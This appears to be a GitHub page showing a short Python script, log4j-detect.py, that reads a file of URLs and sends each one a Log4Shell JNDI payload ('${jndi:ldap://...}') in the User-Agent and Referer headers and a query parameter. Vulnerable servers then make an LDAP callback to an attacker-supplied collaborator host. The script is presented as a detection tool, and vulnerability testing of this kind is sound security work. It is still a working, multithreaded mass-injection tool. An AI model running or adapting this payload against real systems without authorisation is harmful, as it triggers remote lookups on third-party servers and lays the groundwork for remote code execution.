forked from takito1812/log4j-detect
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathlog4j-detect.py
33 lines (29 loc) · 1.05 KB
/
log4j-detect.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
from sys import argv
from requests import get
from urllib3 import disable_warnings
from concurrent.futures import ThreadPoolExecutor
disable_warnings()
proxies = {}
# proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
def sendDetectionRequest(url, urlId):
try:
payload = '${jndi:ldap://' + str(urlId) + '.' + argv[2] + '/a}'
params = {'id':payload}
headers = {'User-Agent':payload, 'Referer':payload}
url = url.strip()
print('[{}] Testing {}'.format(urlId, url))
get(url, headers=headers, params=params, verify=False, proxies=proxies, timeout=10)
except Exception as e:
print(e)
pass
threads = []
urlId = 0
if len(argv) > 1:
urlFile = open(argv[1], 'r')
urlList = urlFile.readlines()
with ThreadPoolExecutor(max_workers=15) as executor:
for url in urlList:
urlId += 1
threads.append(executor.submit(sendDetectionRequest, url, urlId))
else:
print('[!] Syntax: python3 {} <urlFile> <collaboratorPayload>'.format(argv[0]))